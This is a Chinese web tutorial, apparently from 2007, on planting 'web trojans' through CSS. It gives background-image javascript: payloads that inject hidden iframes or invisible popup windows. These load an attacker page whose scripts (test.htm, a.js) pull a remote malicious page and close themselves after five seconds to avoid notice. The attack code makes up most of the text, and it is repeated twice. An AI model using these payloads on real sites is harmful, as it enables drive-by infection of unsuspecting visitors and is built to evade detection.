真正能用,还有点效果的CSS挂马代码的方法
更新时间:2007年10月08日 22:43:39 作者:
(福利推荐:【腾讯云】服务器最新限时优惠活动,云服务器1核2G仅99元/年、2核4G仅768元/3年,立即抢购>>>:9i0i.cn/qcloud)
(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun)
网上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:
body
{
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:
<script src="http://9i0i.com/pic.php?p=a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script>
a.js内容:
document.write('<Iframe src="http://9i0i.com/pic.php?p=http://192.168.0.5/calc.htm"></iframe>');
请指教.
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:
body
{
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:
<script src="http://9i0i.com/pic.php?p=a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script>
a.js内容:
document.write('<Iframe src="http://9i0i.com/pic.php?p=http://192.168.0.5/calc.htm"></iframe>');
请指教.
相关文章
跨站脚本攻击XSS(Cross Site Script)的原理与常见场景分析
XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。这篇文章主要给大家介绍了关于跨站脚本攻击XSS(Cross Site Script)的原理与常见场景的相关资料,需要的朋友可以参考下。2017-12-12当网站不允许上传asp cer cdx htr文件时的一个解决方法!
当网站不允许上传asp cer cdx htr文件时的一个解决方法!...2006-12-12
最新评论